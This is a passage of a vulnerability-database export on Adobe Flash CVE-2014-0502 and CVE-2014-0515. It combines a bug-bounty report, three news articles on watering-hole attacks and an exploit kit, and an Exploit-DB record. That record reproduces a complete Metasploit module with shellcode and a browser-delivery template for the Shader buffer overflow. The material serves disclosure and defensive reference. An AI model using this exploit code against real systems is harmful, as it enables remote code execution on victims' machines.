"AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-09-04T00:55:02", "bounty": 0.0, "description": "This bug was reported directly to Adobe and got assigned CVE-2014-0502.\r\n\r\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-07.html\r\n\r\nThis one was actively (and it still is) exploited since February 12th in watering hole campaigns against nonprofit research institutions and human right activists websites.\r\n\r\nIf I can get a reward for this vulnerability, I'd be happy to give it to charity!", "cvss3": {}, "published": "2014-02-21T20:37:47", "type": "hackerone", "title": "Internet Bug Bounty: Flash double free vulnerability leads to code execution", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0502"], "modified": "2014-02-27T21:44:27", "id": "H1:2170", "href": "https://hackerone.com/reports/2170", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:59:20", "description": "Adobe rushed out an [unscheduled Flash Player update](<http://helpx.adobe.com/security/products/flash-player/apsb14-07.html>) today to counter exploits of a zero-day vulnerability in the software.\n\nA number of national security, foreign policy and public policy websites are hosting exploits that redirect to espionage malware, including the Peter G. Peterson Institute for International Economics, the American Research Center in Egypt and the Smith Richardson Foundation.\n\nThose three nonprofit sites, researchers at FireEye said, are redirecting visitors to an exploit server hosting variants of the PlugX remote access Trojan. FireEye calls the campaign [Operation GreedyWonk](<http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html>).\n\n\u201cThis threat actor clearly seeks out and compromises websites of organizations related to international security policy, defense topics, and other non-profit sociocultural issues,\u201d FireEye wrote in an advisory today. \u201cThe actor either maintains persistence on these sites for extended periods of time or is able to re-compromise them periodically.\u201d\n\nThe hackers behind this campaign have resources that include access to Flash and Java zero-day exploits, FireEye said. They are targeting visitors who use these websites as a resource and those visitors are likely government or embassy employees who are at risk for data loss.\n\nAdobe\u2019s update today is for Flash Player 12.0.0.44 and earlier for Windows and Macintosh, and Flash 11.2.202.336 for Linux. CVE-2014-0502 has been assigned to this vulnerability. FireEye said that the exploit targets Windows XP users, as well as Windows 7 users running an unsupported version of Java (1.6) or out of date versions of Microsoft Office 2007 or 2010. The vulnerability enables someone to remotely overwrite the vftable pointer of a Flash object to redirect code execution.\n\nThe exploit is using the Adobe Flash vulnerability to bypass ASLR and DEP protections native to Windows. It does so by building or using hard-coded return-oriented programming chains in XP and Windows 7 respectively. Upgrading to the latest versions of Java (1.7) or Office will mitigate the threat, but not patch the underlying vulnerability, FireEye said.\n\n\u201cBy breaking the exploit\u2019s ASLR-bypass measures, they do prevent the current in-the-wild exploit from functioning,\u201d FireEye said.\n\nThe hackers are installing the PlugX/Kaba RAT on infected computers; the sample FireEye reported was found on Feb. 13 and compiled the day before, an indication it was purpose-built for these targets. The RAT calls out to three command and control domains, one of which, wmi.ns01[.]us, has been used in other campaigns involving PlugX and the Poison Ivy RAT. Some of the older Poison Ivy samples were found in attacks involving Flash exploits and similar defense and policy websites, including the Center for Defense Information and another using a Java exploit against the Center for European Policy Studies.\n\nToday\u2019s out of band patch is the [second one for Flash this month](<http://threatpost.com/emergency-adobe-update-patches-flash-zero-day/104044>).\n", "cvss3": {}, "published": "2014-02-20T13:31:28", "type": "threatpost", "title": "Emergency Adobe Flash Update Handles Zero Day Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0502"], "modified": "2014-02-24T17:07:03", "id": "THREATPOST:CB12314D0425200AD8F701D46E53BFE9", "href": "https://threatpost.com/emergency-adobe-flash-update-handles-zero-day-under-attack/104387/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:57", "description": "A couple days after Microsoft warned users about a [new vulnerability in Internet Explorer](<https://threatpost.com/new-internet-explorer-cve-2014-1776-zero-day-used-in-targeted-attacks/105720>) that\u2019s being used in targeted attacks, Adobe on Monday said that researchers have discovered a zero day in Flash, as well, which attackers are using to target victims in Syria through a watering hole attack on a compromised Syrian government site.\n\nThe Adobe Flash zero day was first identified in early April by researchers at Kaspersky Lab, who say that there are at least two separate exploits in use right now.\n\nThe attacks are linked to a site owned by the Syrian government, which is being used as a watering hole to target a certain subset of visitors.\n\nThe site apparently was compromised in September and hasn\u2019t been cleaned.\n\n\u201cBoth the exploits detected by us spread from a site located at http://jpic.gov.sy/. The site was launched back in 2011 by the Syrian Ministry of Justice and was designed as an online forum for citizens to complain about law and order violations. We believe the attack was designed to target Syrian dissidents complaining about the government,\u201d Vyacheslav Zakorzhevsky, head of the vulnerability research group at Kaspersky Lab, wrote in an [analysis of the Flash CVE-2014-0515 vulnerability](<https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks>).\n\n**\u201c**When we entered the site, the installed malware payloads were already missing from the \u201c_css\u201d folder. We presume the criminals created a folder whose name doesn\u2019t look out of place on an administration resource, and where they loaded the exploits. The victims were probably redirected to the exploits using a frame or a script located at the site. To date, April 28, the number of detections by our products has exceeded 30. They were detected on the computers of seven unique users, all of them in Syria, which is not surprising considering the nature of the site. Interestingly, all the attacked users entered the website using various versions of Mozilla Firefox.\u201d\n\nAdobe has issued a [patch for the vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-13.html>), and is encouraging users on Windows and OS X to update immediately. The current attacks target Windows users, but that could change.\n\nThere are two exploits for the CVE-2014-0515 vulnerability, and Zakorzhevsky said that both exploits come in the form as unpacked video files. Kaspersky Lab first received the exploit samples in the second week of April, but data shows that customers first began seeing exploit attempts several days earlier.\n\n\u201cAccording to KSN data, these exploits were stored as movie.swf and include.swf at an infected site. The only difference between the two pieces of malware is their shellcodes. It should be noted that the second exploit (include.swf) wasn\u2019t detected using the same heuristic signature as the first, because it contained a unique shellcode,\u201d Zakorzhevsky said.\n\n\u201cAs is usually the case with this kind of exploit, the first stage is a heap spray \u2013 preparing the dynamic memory for exploitation of the vulnerability. The exploits are also designed to check the OS version \u2013 if Windows 8 is detected, a slightly modified byte-code of the Pixel Bender component is used.\u201d\n\nOne of the exploits searches for a specific Cisco extension that\u2019s related to the company\u2019s MeetingPlace software. If that extension isn\u2019t present, the exploit won\u2019t work.\n\n\u201cWe are sure that all these tricks were used in order to carry out malicious activity against a very specific group of users without attracting the attention of security solutions. We believe that the Cisco add-in mentioned above may be used to download/implement the payload as well as to spy directly on the infected computer,\u201d Zakorzhevsky said.\n\nResearchers believe that the operation and the exploits are likely the work of high-level attackers. At this point, Kaspersky Lab has only seen about 30 infection attempts using these exploits.\n\n\u201cIt\u2019s likely that the attack was carefully planned and that professionals of a pretty high caliber were behind it. The use of professionally written 0-day exploits that were used to infect a single resource testifies to this,\u201d Zakorzhevsky said.\n", "cvss3": {}, "published": "2014-04-28T11:43:40", "type": "threatpost", "title": "Flash Zero Day Used to Target Victims in Syria", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0515", "CVE-2014-1776"], "modified": "2014-04-28T20:50:55", "id": "THREATPOST:EFA43E4E6094B0AB8E3B2C61175EF431", "href": "https://threatpost.com/flash-zero-day-used-to-target-victims-in-syria/105726/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:09", "description": "A relatively new exploit kit that borrows modules copied from the Metasploit Framework and exploits any older versions of Adobe Flash, Reader and, Silverlight the user may be using has begun to make the rounds.\n\nJaime Blasco, the director of AlienVault Labs dug deeper into kit, known as Archie, on the [company\u2019s blog yesterday](<http://www.alienvault.com/open-threat-exchange/blog/archie-just-another-exploit-kit>).\n\nFirst discovered by [EmergingThreats in August](<http://emergingthreats.net/daily-ruleset-update-summary-08132014/>), Archie is apparently one of the more basic exploit kits on the market.\n\n\u201cWhen the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information,\u201d Blasco says, regarding Archie\u2019s functionality.\n\nIn addition to Flash and Reader, the kit also checks victims\u2019 machines to see if its running a 64-bit version of Internet Explorer.\n\nIf caught running an outdated version of Flash it will load one of two exploits, including CVE-2014-0497, a zero day that hackers used to deploy password-grabbing Trojans in China [back in February](<http://threatpost.com/details-emerge-on-latest-adobe-flash-zero-day-exploit/104068>). Hackers used the other Flash exploit the kit employs, CVE-2014-0515, in attacks against Syrians [in April](<http://threatpost.com/flash-zero-day-used-to-target-victims-in-syria/105726>).\n\nThe IE vulnerability it checks for, [CVE-2013-2551](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities>), is the same use-after-free memory corruption vulnerability that VUPEN dug up at Pwn2Own 2013.\n\nThe Silverlight vulnerability Archie exploits is an old one as well. Despite being patched in March 2013, the kit exploits a vulnerability, [CVE-2013-0074](<threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>), that targets Silverlight 5 and opens up systems running it up to remote code execution.\n\n\u201cArchie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them,\u201d Blasco wrote.\n\nThe shellcode then kickstarts a basic download and execute payload, which Blasco said comes from the same IP address as one being used for a .NET click fraud bot.\n\nA bevy of new exploit kits have been circulating in the 10 or so months since authorities in Russia [arrested Paunch](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), the Blackhole Exploit Kit\u2019s creator. [Blackhole and Cool](<http://threatpost.com/blackhole-and-cool-exploit-kits-nearly-extinct/103034>), another Exploit Kit assumed to have been crafted by Paunch, dissolved soon after.\n\nMalicious ads on Yahoo were found linking European users to one of those kits, Magnitude, in January while this summer, men\u2019s lifestyle site AskMen.com was spotted directing users to the Nuclear Pack Exploit Kit.\n\nArchie joins another exploit kit, Angler, in targeting Silverlight vulnerabilities. Silverlight, Microsoft\u2019s app framework, is perhaps best known for powering media streaming services like Netflix. [Java.com and TMZ.com](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) were found sending users to sites peddling Angler last month.\n", "cvss3": {}, "published": "2014-09-16T17:25:57", "type": "threatpost", "title": "Archie Exploit Kit Spotted Leveraging Adobe, Silverlight Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0074", "CVE-2013-2551", "CVE-2014-0497", "CVE-2014-0515"], "modified": "2014-09-16T21:25:57", "id": "THREATPOST:9928E4032CF09647D7486B6AB9996982", "href": "https://threatpost.com/archie-exploit-kit-targets-adobe-silverlight-vulnerabilities/108317/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2023-06-22T02:54:52", "description": "", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player - Shader Buffer Overflow (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2014-0515", "CVE-2014-0515"], "modified": "2014-05-12T00:00:00", "id": "EDB-ID:33333", "href": "https://www.exploit-db.com/exploits/33333", "sourceData": "##\n# This module requires Metasploit: http//metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\n\nclass Metasploit3 < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Adobe Flash Player Shader Buffer Overflow\",\n 'Description' => %q{\n This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\n vulnerability occurs in the flash.Display.Shader class, when setting specially\n crafted data as its bytecode, as exploited in the wild in April 2014. This module\n has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over\n Windows XP SP3, Windows 7 SP1 and Windows 8.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2014-0515'],\n ['BID', '67092'],\n ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],\n ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2000,\n 'DisableNops' => true,\n 'PrependEncoder' => stack_adjust\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'migrate -f',\n 'Retries' => false,\n 'EXITFUNC' => \"thread\"\n },\n 'Platform' => 'win',\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :clsid => \"{D27CDB6E-AE6D-11cf-96B8-444553540000}\",\n :method => \"LoadMovie\",\n :os_name => Msf::OperatingSystems::WINDOWS,\n :ua_name => Msf::HttpClients::IE,\n :flash => lambda { |ver| ver =~ /^11\\./ || ver =~ /^12\\./ || (ver =~ /^13\\./ && ver <= '13.0.0.182') }\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Apr 28 2014\",\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def stack_adjust\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n\n adjust\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status(\"Sending SWF...\")\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status(\"Sending HTML...\")\n tag = retrieve_tag(cli, request)\n profile = get_profile(tag)\n profile[:tried] = false unless profile.nil? # to allow request the swf\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n flash_payload = \"\"\n get_payload(cli,target_info).unpack(\"V*\").each do |i|\n flash_payload << \"0x#{i.to_s(16)},\"\n end\n flash_payload.gsub!(/,$/, \"\")\n\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=flash_payload%>\" />\n <param name=\"Play\" value=\"true\" />\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0515\", \"Graph.swf\" )\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\n\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/remote/33333.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
Adobe Flash Player: Multiple vulnerabilities
